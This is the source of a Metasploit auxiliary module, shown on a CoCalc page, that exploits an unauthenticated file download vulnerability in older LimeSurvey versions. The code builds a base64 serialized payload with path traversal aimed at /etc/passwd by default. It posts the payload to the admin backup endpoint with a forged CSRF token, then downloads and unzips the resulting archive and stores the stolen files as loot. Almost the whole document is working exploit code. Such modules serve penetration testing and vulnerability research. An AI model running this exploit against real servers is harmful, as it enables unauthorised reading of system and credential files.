Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/limesurvey_file_download.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
# for extracting files
7
require 'zip'
8
9
class MetasploitModule < Msf::Auxiliary
10
include Msf::Auxiliary::Report
11
include Msf::Exploit::Remote::HttpClient
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Limesurvey Unauthenticated File Download',
18
'Description' => %q{
19
This module exploits an unauthenticated file download vulnerability
20
in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded
21
as a ZIP and unzipped automatically, thus binary files can be downloaded.
22
},
23
'Author' => [
24
'Pichaya Morimoto', # Vulnerability Discovery
25
'Christian Mehlmauer' # Metasploit module
26
],
27
'License' => MSF_LICENSE,
28
'References' => [
29
['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/'],
30
['URL', 'https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015'],
31
['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']
32
],
33
'DisclosureDate' => '2015-10-12',
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [IOC_IN_LOGS],
37
'Reliability' => []
38
}
39
)
40
)
41
42
register_options(
43
[
44
Opt::RPORT(80),
45
OptString.new('TARGETURI', [true, 'The base path to the limesurvey installation', '/']),
46
OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),
47
OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 15])
48
]
49
)
50
end
51
52
def filepath
53
datastore['FILEPATH']
54
end
55
56
def traversal_depth
57
datastore['TRAVERSAL_DEPTH']
58
end
59
60
def payload
61
traversal = '/..' * traversal_depth
62
file = "#{traversal}#{filepath}"
63
serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' + file.length.to_s + ':"' + file + '";}}'
64
Rex::Text.encode_base64(serialized)
65
end
66
67
def unzip_file(zipfile)
68
zip_data = Hash.new
69
begin
70
Zip::File.open_buffer(zipfile) do |filezip|
71
filezip.each do |entry|
72
zip_data[::File.expand_path(entry.name)] = filezip.read(entry)
73
end
74
end
75
rescue Zip::Error => e
76
print_error("Error extracting ZIP: #{e}")
77
end
78
return zip_data
79
end
80
81
def run
82
csrf_token = Rex::Text.rand_text_alpha(10)
83
84
vars_post = {
85
'YII_CSRF_TOKEN' => csrf_token,
86
'destinationBuild' => Rex::Text.rand_text_alpha(5),
87
'datasupdateinfo' => payload
88
}
89
90
res = send_request_cgi({
91
'method' => 'POST',
92
'uri' => normalize_uri(target_uri, 'index.php', 'admin', 'update', 'sa', 'backup'),
93
'cookie' => "YII_CSRF_TOKEN=#{csrf_token}",
94
'vars_post' => vars_post
95
})
96
97
if res && res.code == 200 && res.body && res.body.include?('Download this file')
98
match = res.body.match(%r{<div class="updater-background">\s+<p class="success " style="text-align: left;">\s+<strong>[^<]+</strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})
99
if match
100
local_path = match[1]
101
download_url = match[2]
102
print_status("File saved to #{local_path}")
103
print_status("Downloading backup from URL #{download_url}")
104
105
res = send_request_cgi({
106
'method' => 'GET',
107
'uri' => download_url
108
})
109
110
if res && res.code == 200
111
unzipped = unzip_file(res.body)
112
113
unzipped.each do |filename, content|
114
print_good("Filename: #{filename}")
115
print_good(content)
116
117
path = store_loot(
118
'limesurvey.http',
119
'application/octet-stream',
120
rhost,
121
content,
122
filename
123
)
124
print_good("File saved in: #{path}")
125
end
126
else
127
print_error('Failed to download file')
128
end
129
else
130
print_error('Failed to download file')
131
end
132
else
133
print_error('Failed to download file')
134
end
135
end
136
end
137
138